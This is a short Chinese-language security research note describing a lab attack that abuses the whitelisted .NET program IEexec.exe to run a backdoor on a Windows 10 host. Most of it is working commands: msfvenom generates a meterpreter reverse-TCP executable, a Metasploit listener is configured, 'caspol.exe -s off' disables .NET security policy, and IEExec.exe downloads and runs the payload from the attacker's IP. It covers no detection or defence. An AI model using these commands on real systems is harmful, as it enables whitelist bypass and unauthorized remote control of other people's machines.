返回首页
EN
H7 / SECURITY RESEARCH NOTES

滥用白名单IEexec.exe执行后门程序获取主机权限

环境说明

IPHOSTNAMENOTE
172.16.106.67kali_dqy攻击者主机
10.10.10.88win10_dqy受害者主机

前言

  • IEexec.exe应用程序是.NET Framework附带程序,存在于多个系统白名单内,攻击者可以通过其执行相应的后门文件来获取windows主机权限。

攻击过程

MSF生成后门程序

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=172.16.106.67 LPORT=2335 -f exe > attack_demo.exe

MSF监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 172.16.106.67
set lport 2335
exploit

通过IEexec.exe执行后门程序

  • IEexec.exe在64位系统的路径为:
c:\Windows\Microsoft.NET\Framework\v2.0.50727 
  • 在Windows 10主机上以管理员权限启动cmd,通过IEexec.exe执行我们的后门程序
caspol.exe -s off
IEExec.exe http://172.16.106.67/attack_demo.exe